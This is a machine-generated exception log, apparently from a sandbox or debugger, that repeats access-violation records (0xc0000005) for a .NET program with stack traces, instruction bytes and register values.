DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467692
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467700
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41875664
registers.ecx: 45577792
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25da43e
0x25d9cf9
0x25d501d
0x25d3ba4
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467692
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467700
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41875664
registers.ecx: 47003208
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25dad6a
0x25da711
0x25d5005
0x25d3cbc
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467744
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467752
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41875664
registers.ecx: 42110972
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25dad6a
0x25da711
0x25d501d
0x25d3cbc
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467744
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467752
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41853032
registers.ecx: 43504896
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25dad6a
0x25da711
0x25d501d
0x25d3cbc
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467744
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467752
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41853032
registers.ecx: 44898544
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25db47c
0x25daed9
0x25d5005
0x25d3dc2
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467776
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467784
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41853032
registers.ecx: 46292328
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25db47c
0x25daed9
0x25d501d
0x25d3dc2
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467776
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467784
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41853032
registers.ecx: 43057776
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25db47c
0x25daed9
0x25d501d
0x25d3dc2
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467776
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467784
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41853032
registers.ecx: 44454048
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25dc803
0x25dbdae
0x25d2aa9
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3468596
registers.edi: 3468860
registers.eax: 0
registers.ebp: 3468604
registers.edx: 0
registers.ebx: 3470684
registers.esi: 45022956
registers.ecx: 45029932
1 0 0

__exception__

 stacktrace: 
0x227d329
0x227d12b
0x2277ad8
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x227d460
registers.esp: 33746852
registers.edi: 33746904
registers.eax: 0
registers.ebp: 33746916
registers.edx: 3031200
registers.ebx: 33748356
registers.esi: 40122568
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6c6d7c
0xa6c6612
0xa6c64e5
0xa6c4d9b
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745380
registers.edi: 33745724
registers.eax: 0
registers.ebp: 33745388
registers.edx: 0
registers.ebx: 33748356
registers.esi: 40770096
registers.ecx: 41896572
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6c6d7c
0xa6c6612
0xa6c64fd
0xa6c4d9b
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745380
registers.edi: 33745724
registers.eax: 0
registers.ebp: 33745388
registers.edx: 0
registers.ebx: 33748356
registers.esi: 40770096
registers.ecx: 43201264
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6c6d7c
0xa6c6612
0xa6c64fd
0xa6c4d9b
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745380
registers.edi: 33745724
registers.eax: 0
registers.ebp: 33745388
registers.edx: 0
registers.ebx: 33748356
registers.esi: 40770096
registers.ecx: 40658360
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cb91e
0xa6cb1d9
0xa6c64e5
0xa6c5084
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745356
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745364
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39708068
registers.ecx: 41967200
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cb91e
0xa6cb1d9
0xa6c64fd
0xa6c5084
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
